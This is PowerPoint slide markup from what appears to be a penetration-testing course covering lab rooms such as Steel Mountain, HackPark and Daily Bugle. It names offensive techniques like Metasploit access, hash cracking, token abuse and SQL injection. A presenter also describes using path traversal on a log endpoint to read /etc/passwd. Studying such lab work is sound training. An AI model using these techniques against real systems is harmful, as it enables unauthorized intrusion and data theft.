            <a:ext cx="355997" cy="355997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="3009900"/>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Public Exploits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="3317776"/>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Learning to find and utilize publicly available exploit code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 3" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="3972818"/>
            <a:ext cx="355997" cy="355997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="4471194"/>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Password Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="4779069"/>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Techniques for breaking weak passwords and hashes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Image 4" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="5434112"/>
            <a:ext cx="355997" cy="355997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="5932488"/>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Port Redirection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1375" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070376" y="6240363"/>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Manipulating network traffic to bypass security controls.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1083"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993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644426" y="506314"/>
            <a:ext cx="6331148" cy="1150938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3583" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Steel Mountain and Alfred Rooms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="644426" y="1933377"/>
            <a:ext cx="920651" cy="1473101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841203" y="2117428"/>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Initial Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1792" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841202" y="2515593"/>
            <a:ext cx="5134372" cy="294581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Using Metasploit to gain a foothold on the target system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1417" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="644426" y="3406478"/>
            <a:ext cx="920651" cy="1473101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841203" y="3590529"/>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Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1792" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841202" y="3988694"/>
            <a:ext cx="5134372" cy="589161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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Utilizing PowerShell for Windows privilege escalation enumeration.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1417" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 3" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="644426" y="4879579"/>
            <a:ext cx="920651" cy="1473101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841203" y="5063630"/>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Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1792" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841202" y="5461795"/>
            <a:ext cx="5134372" cy="589161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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Exploiting Windows authentication tokens to gain Administrator access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1417"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406723"/>
            <a:ext cx="6179939" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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HackPark and Game Zone Rooms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4042" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292031" y="3001169"/>
            <a:ext cx="6179939" cy="2450108"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3527"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="24000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5304731" y="3013870"/>
            <a:ext cx="6153844" cy="588764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="4000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511106" y="3143647"/>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Room</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565331" y="3143647"/>
            <a:ext cx="1633339"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Key Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9616381" y="3143647"/>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Target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5304731" y="3602632"/>
            <a:ext cx="6153844" cy="917972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="4000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511106" y="3732411"/>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HackPark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565331" y="3732411"/>
            <a:ext cx="1633339"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Hydra, Public Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9616381" y="3732411"/>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Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5304731" y="4520605"/>
            <a:ext cx="6153844" cy="917972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="4000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511106" y="4650383"/>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Game Zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565331" y="4650383"/>
            <a:ext cx="1633339"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SQLMap, SSH Tunneling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9616381" y="4650383"/>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Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583"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2165053"/>
            <a:ext cx="6985694"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Skynet and Daily Bugle Rooms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4042" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031"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Skynet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720031"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Exploiting a Terminator-themed Linux machine, focusing on enumeration and privilege escalation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6353274"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Daily Bugle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6353274"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Compromising a Joomla CMS via SQL injection, cracking hashes, and escalating privileges.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="158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4881" y="662980"/>
            <a:ext cx="6294239" cy="1183680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4625"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3708" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Overpass 2 and Penetration Testing Challenges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3708" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234881" y="2343746"/>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5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367139" y="2414786"/>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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2208" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="2343745"/>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Overpass 2 - Hacked</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1833" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="2753221"/>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Analyzing attacker actions and performing a counter-hack on a compromised system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1458" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234881" y="3761582"/>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9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367139" y="3832622"/>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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2208" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="3761582"/>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Relevant</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1833" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="4171057"/>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 comprehensive penetration testing challenge to apply all learned skills.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1458" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234881" y="5179418"/>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13" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367139" y="5250458"/>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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2208" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="5179418"/>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Internal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1833" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850334" y="5588894"/>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Advanced penetration testing scenario simulating real-world corporate environments.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1458"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7B6288-939E-EF96-DB09-55B99ECD23EB}"/>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2B47487C-788A-AE11-6584-CCA540C093AE}"/>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5623972-A5C7-856D-18E9-88B72B43BD3C}"/>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880C650-2338-222F-6E2C-8DACA869D499}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="3998018"/>
            <a:ext cx="3981854" cy="2216513"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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FCABFF5-EC04-60B1-45BB-8F25B4234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631316"/>
            <a:ext cx="10872172" cy="148925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7C386F8C-6FB1-9ACF-6BBB-484AAEB4A725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4970835" y="3998019"/>
            <a:ext cx="6382966" cy="2216512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I tried the important endpoints that gave me information which are list users endpoint that give me all the users in the application and the view logs endpoint which give me all the file logs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40110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FFA6B8-7BE3-5753-4D72-4864779CCD5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31C30-60BE-9E3D-9420-7DF063CCA49C}"/>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6CC4745B-CE6F-8742-AF42-FABA02EC12D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008184" y="1459907"/>
            <a:ext cx="10175630" cy="1111842"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In the endpoint that give me the logs, it accepts a path to the log file, so I tried path traversal technique and it worked and I was able to get the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/passwd file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2C0CFB9-A420-8CE5-29F3-9364B1C78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3132407"/>
            <a:ext cx="10515595" cy="2444876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20774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E7AA35-0834-A666-48ED-733948ECCF5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068738" y="5298263"/>
            <a:ext cx="10053527" cy="693937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
